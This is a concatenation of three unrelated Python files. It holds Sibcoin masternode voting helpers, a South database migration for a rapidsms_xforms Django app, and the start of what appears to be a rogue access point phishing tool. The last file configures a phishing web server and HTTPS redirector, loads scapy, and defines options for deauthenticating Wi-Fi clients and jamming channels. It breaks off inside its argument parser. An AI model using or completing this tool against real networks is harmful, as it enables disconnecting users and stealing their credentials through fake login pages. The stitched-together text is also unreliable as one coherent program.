    as_json = simplejson.dumps(dikt, sort_keys=True, use_decimal=True)
    return binascii.hexlify(as_json.encode('utf-8')).decode('utf-8')
def did_we_vote(output):
    """Inspect a vote RPC response and report whether our vote registered.

    'success' counts as voted; a 'voting too often' failure means the
    network already has our vote, which this function still reports as
    not-voted (the caller resyncs instead).

    NOTE(review): if `output` has no 'detail' key, the .get() chain below
    raises AttributeError, which is NOT caught. `e.message` is a Python 2
    idiom -- confirm the runtime, or prefer str(e).
    """
    from bitcoinrpc.authproxy import JSONRPCException
    # sentinel
    voted = False
    err_msg = ''
    try:
        detail = output.get('detail').get('sibcoin.conf')
        result = detail.get('result')
        if 'errorMessage' in detail:
            err_msg = detail.get('errorMessage')
    except JSONRPCException as e:
        result = 'failed'
        err_msg = e.message
    # success, failed
    printdbg("result = [%s]" % result)
    if err_msg:
        printdbg("err_msg = [%s]" % err_msg)
    voted = False
    if result == 'success':
        voted = True
    # in case we spin up a new instance or server, but have already voted
    # on the network and network has recorded those votes
    m_old = re.match(r'^time between votes is too soon', err_msg)
    m_new = re.search(r'Masternode voting too often', err_msg, re.M)
    if result == 'failed' and (m_old or m_new):
        printdbg("DEBUG: Voting too often, need to sync w/network")
        voted = False
    return voted
def parse_raw_votes(raw_votes):
    """Convert a raw `gobject getvotes` mapping into a list of vote dicts.

    Each raw value has the colon-separated form
    ``outpoint:ntime:outcome:signal``.
    """
    parsed = []
    for raw in raw_votes.values():
        outpoint, ntime, outcome, signal = raw.split(':')
        parsed.append({
            'mn_collateral_outpoint': parse_masternode_status_vin(outpoint),
            'signal': signal.lower(),
            'outcome': outcome.lower(),
            'ntime': ntime,
        })
    return parsed
def blocks_to_seconds(blocks):
    """
    Return the estimated number of seconds which will transpire for a given
    number of blocks.
    """
    # Average block time is ~2.62 minutes; convert to seconds.
    estimated_minutes = blocks * 2.62
    return estimated_minutes * 60
| |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Initial South schema migration for the rapidsms_xforms app."""

    # Migrations that must run before this one: the tables below hold
    # foreign keys into eav and rapidsms_httprouter.
    depends_on = (
        ("eav", "0001_initial"),
        ("rapidsms_httprouter", "0001_initial"),)
def forwards(self, orm):
    """Create the initial database tables for the rapidsms_xforms app.

    Auto-generated by South; kept verbatim (only comments added) because
    this is a historical migration.
    """
    # Adding model 'XForm'
    db.create_table('rapidsms_xforms_xform', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('name', self.gf('django.db.models.fields.CharField')(max_length=32)),
        ('keyword', self.gf('eav.fields.EavSlugField')(max_length=32, db_index=True)),
        ('description', self.gf('django.db.models.fields.TextField')(max_length=255)),
        ('response', self.gf('django.db.models.fields.CharField')(max_length=255)),
        ('active', self.gf('django.db.models.fields.BooleanField')(default=True)),
        ('command_prefix', self.gf('django.db.models.fields.CharField')(default='+', max_length=1, null=True, blank=True)),
        ('keyword_prefix', self.gf('django.db.models.fields.CharField')(max_length=1, null=True, blank=True)),
        ('separator', self.gf('django.db.models.fields.CharField')(max_length=8, null=True, blank=True)),
        ('restrict_message', self.gf('django.db.models.fields.CharField')(max_length=160, null=True, blank=True)),
        ('owner', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
        ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
        ('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
        ('site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'])),
    ))
    db.send_create_signal('rapidsms_xforms', ['XForm'])

    # Adding M2M table for field restrict_to on 'XForm'
    db.create_table('rapidsms_xforms_xform_restrict_to', (
        ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
        ('xform', models.ForeignKey(orm['rapidsms_xforms.xform'], null=False)),
        ('group', models.ForeignKey(orm['auth.group'], null=False))
    ))
    db.create_unique('rapidsms_xforms_xform_restrict_to', ['xform_id', 'group_id'])

    # Adding model 'XFormField'
    db.create_table('rapidsms_xforms_xformfield', (
        ('attribute_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['eav.Attribute'], unique=True, primary_key=True)),
        ('xform', self.gf('django.db.models.fields.related.ForeignKey')(related_name='fields', to=orm['rapidsms_xforms.XForm'])),
        ('field_type', self.gf('django.db.models.fields.SlugField')(db_index=True, max_length=8, null=True, blank=True)),
        ('command', self.gf('eav.fields.EavSlugField')(max_length=32, db_index=True)),
        ('order', self.gf('django.db.models.fields.IntegerField')(default=0)),
        ('question', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
    ))
    db.send_create_signal('rapidsms_xforms', ['XFormField'])

    # Adding model 'XFormFieldConstraint'
    db.create_table('rapidsms_xforms_xformfieldconstraint', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('field', self.gf('django.db.models.fields.related.ForeignKey')(related_name='constraints', to=orm['rapidsms_xforms.XFormField'])),
        ('type', self.gf('django.db.models.fields.CharField')(max_length=10)),
        ('test', self.gf('django.db.models.fields.CharField')(max_length=255, null=True)),
        ('message', self.gf('django.db.models.fields.CharField')(max_length=160)),
        ('order', self.gf('django.db.models.fields.IntegerField')(default=1000)),
    ))
    db.send_create_signal('rapidsms_xforms', ['XFormFieldConstraint'])

    # Adding model 'XFormSubmission'
    db.create_table('rapidsms_xforms_xformsubmission', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('xform', self.gf('django.db.models.fields.related.ForeignKey')(related_name='submissions', to=orm['rapidsms_xforms.XForm'])),
        ('type', self.gf('django.db.models.fields.CharField')(max_length=8)),
        ('connection', self.gf('django.db.models.fields.related.ForeignKey')(related_name='submissions', null=True, to=orm['rapidsms.Connection'])),
        ('raw', self.gf('django.db.models.fields.TextField')()),
        ('has_errors', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
        ('confirmation_id', self.gf('django.db.models.fields.IntegerField')(default=0)),
        ('message', self.gf('django.db.models.fields.related.ForeignKey')(related_name='submissions', null=True, to=orm['rapidsms_httprouter.Message'])),
    ))
    db.send_create_signal('rapidsms_xforms', ['XFormSubmission'])

    # Adding model 'XFormSubmissionValue'
    db.create_table('rapidsms_xforms_xformsubmissionvalue', (
        ('value_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['eav.Value'], unique=True, primary_key=True)),
        ('submission', self.gf('django.db.models.fields.related.ForeignKey')(related_name='values', to=orm['rapidsms_xforms.XFormSubmission'])),
    ))
    db.send_create_signal('rapidsms_xforms', ['XFormSubmissionValue'])

    # Adding model 'BinaryValue'
    db.create_table('rapidsms_xforms_binaryvalue', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('binary', self.gf('django.db.models.fields.files.FileField')(max_length=100)),
    ))
    db.send_create_signal('rapidsms_xforms', ['BinaryValue'])
def backwards(self, orm):
    """Reverse the migration by dropping every table created in forwards().

    Tables are dropped in the same order the original migration used.
    """
    tables_to_drop = (
        'rapidsms_xforms_xform',                 # model 'XForm'
        'rapidsms_xforms_xform_restrict_to',     # M2M for field restrict_to on 'XForm'
        'rapidsms_xforms_xformfield',            # model 'XFormField'
        'rapidsms_xforms_xformfieldconstraint',  # model 'XFormFieldConstraint'
        'rapidsms_xforms_xformsubmission',       # model 'XFormSubmission'
        'rapidsms_xforms_xformsubmissionvalue',  # model 'XFormSubmissionValue'
        'rapidsms_xforms_binaryvalue',           # model 'BinaryValue'
    )
    for table_name in tables_to_drop:
        db.delete_table(table_name)
# Frozen ORM snapshot captured by South when this migration was generated;
# South uses it to reconstruct model classes for forwards()/backwards().
# Kept verbatim -- do not edit by hand.
models = {
    'auth.group': {
        'Meta': {'object_name': 'Group'},
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
        'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
    },
    'auth.permission': {
        'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
        'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
    },
    'auth.user': {
        'Meta': {'object_name': 'User'},
        'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
        'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
        'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
        'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
        'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
        'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
        'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
        'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
    },
    'contenttypes.contenttype': {
        'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
        'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
    },
    'eav.attribute': {
        'Meta': {'ordering': "['name']", 'unique_together': "(('site', 'slug'),)", 'object_name': 'Attribute'},
        'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
        'datatype': ('eav.fields.EavDatatypeField', [], {'max_length': '6'}),
        'description': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
        'enum_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['eav.EnumGroup']", 'null': 'True', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
        'slug': ('eav.fields.EavSlugField', [], {'max_length': '50', 'db_index': 'True'}),
        'type': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'})
    },
    'eav.enumgroup': {
        'Meta': {'object_name': 'EnumGroup'},
        'enums': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['eav.EnumValue']", 'symmetrical': 'False'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
    },
    'eav.enumvalue': {
        'Meta': {'object_name': 'EnumValue'},
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
    },
    'eav.value': {
        'Meta': {'object_name': 'Value'},
        'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['eav.Attribute']"}),
        'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
        'entity_ct': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'value_entities'", 'to': "orm['contenttypes.ContentType']"}),
        'entity_id': ('django.db.models.fields.IntegerField', [], {}),
        'generic_value_ct': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'value_values'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
        'generic_value_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
        'value_bool': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
        'value_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
        'value_enum': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'eav_values'", 'null': 'True', 'to': "orm['eav.EnumValue']"}),
        'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
        'value_int': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
        'value_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
    },
    'locations.location': {
        'Meta': {'object_name': 'Location'},
        'code': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
        'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'parent_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
        'parent_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
        'point': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['locations.Point']", 'null': 'True', 'blank': 'True'}),
        'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
        'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
        'tree_parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['locations.Location']"}),
        'type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'locations'", 'null': 'True', 'to': "orm['locations.LocationType']"})
    },
    'locations.locationtype': {
        'Meta': {'object_name': 'LocationType'},
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'primary_key': 'True', 'db_index': 'True'})
    },
    'locations.point': {
        'Meta': {'object_name': 'Point'},
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'latitude': ('django.db.models.fields.DecimalField', [], {'max_digits': '13', 'decimal_places': '10'}),
        'longitude': ('django.db.models.fields.DecimalField', [], {'max_digits': '13', 'decimal_places': '10'})
    },
    'logistics.contactrole': {
        'Meta': {'object_name': 'ContactRole'},
        'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
        'responsibilities': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['logistics.Responsibility']", 'null': 'True', 'blank': 'True'})
    },
    'logistics.product': {
        'Meta': {'object_name': 'Product'},
        'average_monthly_consumption': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
        'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
        'emergency_order_level': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
        'equivalents': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'equivalents_rel_+'", 'null': 'True', 'to': "orm['logistics.Product']"}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'product_code': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
        'sms_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
        'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['logistics.ProductType']"}),
        'units': ('django.db.models.fields.CharField', [], {'max_length': '100'})
    },
    'logistics.producttype': {
        'Meta': {'object_name': 'ProductType'},
        'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
    },
    'logistics.responsibility': {
        'Meta': {'object_name': 'Responsibility'},
        'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
    },
    'logistics.supplypoint': {
        'Meta': {'object_name': 'SupplyPoint'},
        'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
        'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'last_reported': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
        'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['locations.Location']"}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'supplied_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['logistics.SupplyPoint']", 'null': 'True', 'blank': 'True'}),
        'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['logistics.SupplyPointType']"})
    },
    'logistics.supplypointtype': {
        'Meta': {'object_name': 'SupplyPointType'},
        'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'primary_key': 'True', 'db_index': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
    },
    'rapidsms.backend': {
        'Meta': {'object_name': 'Backend'},
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'})
    },
    'rapidsms.connection': {
        'Meta': {'unique_together': "(('backend', 'identity'),)", 'object_name': 'Connection'},
        'backend': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['rapidsms.Backend']"}),
        'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['rapidsms.Contact']", 'null': 'True', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'identity': ('django.db.models.fields.CharField', [], {'max_length': '100'})
    },
    'rapidsms.contact': {
        'Meta': {'object_name': 'Contact'},
        'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'birthdate': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
        'commodities': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'reported_by'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['logistics.Product']"}),
        'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True'}),
        'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'is_approved': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'language': ('django.db.models.fields.CharField', [], {'max_length': '6', 'blank': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
        'needs_reminders': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'reporting_location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['locations.Location']", 'null': 'True', 'blank': 'True'}),
        'role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['logistics.ContactRole']", 'null': 'True', 'blank': 'True'}),
        'supply_point': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['logistics.SupplyPoint']", 'null': 'True', 'blank': 'True'}),
        'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'contact'", 'unique': 'True', 'null': 'True', 'to': "orm['auth.User']"}),
        'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
        'village': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'villagers'", 'null': 'True', 'to': "orm['locations.Location']"}),
        'village_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
    },
    'rapidsms_httprouter.message': {
        'Meta': {'object_name': 'Message'},
        'application': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
        'batch': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'messages'", 'null': 'True', 'to': "orm['rapidsms_httprouter.MessageBatch']"}),
        'connection': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'messages'", 'to': "orm['rapidsms.Connection']"}),
        'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
        'direction': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'in_response_to': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'responses'", 'null': 'True', 'to': "orm['rapidsms_httprouter.Message']"}),
        'priority': ('django.db.models.fields.IntegerField', [], {'default': '10'}),
        'status': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
        'text': ('django.db.models.fields.TextField', [], {})
    },
    'rapidsms_httprouter.messagebatch': {
        'Meta': {'object_name': 'MessageBatch'},
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'status': ('django.db.models.fields.CharField', [], {'max_length': '1'})
    },
    'rapidsms_xforms.binaryvalue': {
        'Meta': {'object_name': 'BinaryValue'},
        'binary': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
    },
    'rapidsms_xforms.xform': {
        'Meta': {'object_name': 'XForm'},
        'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'command_prefix': ('django.db.models.fields.CharField', [], {'default': "'+'", 'max_length': '1', 'null': 'True', 'blank': 'True'}),
        'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
        'description': ('django.db.models.fields.TextField', [], {'max_length': '255'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'keyword': ('eav.fields.EavSlugField', [], {'max_length': '32', 'db_index': 'True'}),
        'keyword_prefix': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
        'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
        'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
        'response': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
        'restrict_message': ('django.db.models.fields.CharField', [], {'max_length': '160', 'null': 'True', 'blank': 'True'}),
        'restrict_to': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
        'separator': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True', 'blank': 'True'}),
        'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"})
    },
    'rapidsms_xforms.xformfield': {
        'Meta': {'ordering': "('order', 'id')", 'object_name': 'XFormField', '_ormbases': ['eav.Attribute']},
        'attribute_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['eav.Attribute']", 'unique': 'True', 'primary_key': 'True'}),
        'command': ('eav.fields.EavSlugField', [], {'max_length': '32', 'db_index': 'True'}),
        'field_type': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '8', 'null': 'True', 'blank': 'True'}),
        'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
        'question': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
        'xform': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fields'", 'to': "orm['rapidsms_xforms.XForm']"})
    },
    'rapidsms_xforms.xformfieldconstraint': {
        'Meta': {'object_name': 'XFormFieldConstraint'},
        'field': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'constraints'", 'to': "orm['rapidsms_xforms.XFormField']"}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'message': ('django.db.models.fields.CharField', [], {'max_length': '160'}),
        'order': ('django.db.models.fields.IntegerField', [], {'default': '1000'}),
        'test': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
        'type': ('django.db.models.fields.CharField', [], {'max_length': '10'})
    },
    'rapidsms_xforms.xformsubmission': {
        'Meta': {'object_name': 'XFormSubmission'},
        'confirmation_id': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
        'connection': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'submissions'", 'null': 'True', 'to': "orm['rapidsms.Connection']"}),
        'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
        'has_errors': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'message': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'submissions'", 'null': 'True', 'to': "orm['rapidsms_httprouter.Message']"}),
        'raw': ('django.db.models.fields.TextField', [], {}),
        'type': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
        'xform': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'submissions'", 'to': "orm['rapidsms_xforms.XForm']"})
    },
    'rapidsms_xforms.xformsubmissionvalue': {
        'Meta': {'object_name': 'XFormSubmissionValue', '_ormbases': ['eav.Value']},
        'submission': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'values'", 'to': "orm['rapidsms_xforms.XFormSubmission']"}),
        'value_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['eav.Value']", 'unique': 'True', 'primary_key': 'True'})
    },
    'sites.site': {
        'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
        'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
    }
}

# Apps whose frozen models above are considered complete by South.
complete_apps = ['rapidsms_xforms']
| |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import os
import ssl
import re
import time
import sys
import SimpleHTTPServer
import BaseHTTPServer
import ConfigParser
import httplib
import SocketServer
import cgi
import string
import argparse
import fcntl
from threading import Thread, Lock
from subprocess import Popen, PIPE, check_output
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0  # silence scapy's per-packet console output

# Basic configuration
PORT = 8080  # plain-HTTP phishing server port
SSL_PORT = 443  # HTTPS redirector port
PEM = 'cert/server.pem'  # combined key + certificate file for the SSL server
# [sic] misspelling of "PHISHING" kept -- the name is referenced elsewhere
PHISING_PAGE = "access-point-pages/minimal"
DN = open(os.devnull, 'w')  # sink for child-process output

# Console colors (ANSI escape codes)
W = '\033[0m'  # white (normal)
R = '\033[31m'  # red
G = '\033[32m'  # green
O = '\033[33m'  # orange
B = '\033[34m'  # blue
P = '\033[35m'  # purple
C = '\033[36m'  # cyan
GR = '\033[37m'  # gray
T = '\033[93m'  # tan

count = 0  # for channel hopping Thread
APs = {}  # for listing APs
hop_daemon_running = True  # flag read by the channel-hopping thread
lock = Lock()  # shared lock -- acquired by code outside this view
def parse_args():
    """Define and parse the command line options for this script."""
    ap = argparse.ArgumentParser()
    # Channel / targeting options.
    ap.add_argument("-c", "--channel", default="1",
                    help="Choose the channel for monitoring. Default is channel 1")
    ap.add_argument("-s", "--skip",
                    help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
    # Interface selection.
    ap.add_argument("-jI", "--jamminginterface",
                    help="Choose monitor mode interface. By default script will find the most powerful interface and starts monitor mode on it. Example: -jI mon5")
    ap.add_argument("-aI", "--apinterface",
                    help="Choose monitor mode interface. By default script will find the second most powerful interface and starts monitor mode on it. Example: -aI mon5")
    # Deauthentication tuning.
    ap.add_argument("-m", "--maximum",
                    help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
    ap.add_argument("-n", "--noupdate", action='store_true',
                    help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n")
    ap.add_argument("-t", "--timeinterval",
                    help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
    ap.add_argument("-p", "--packets",
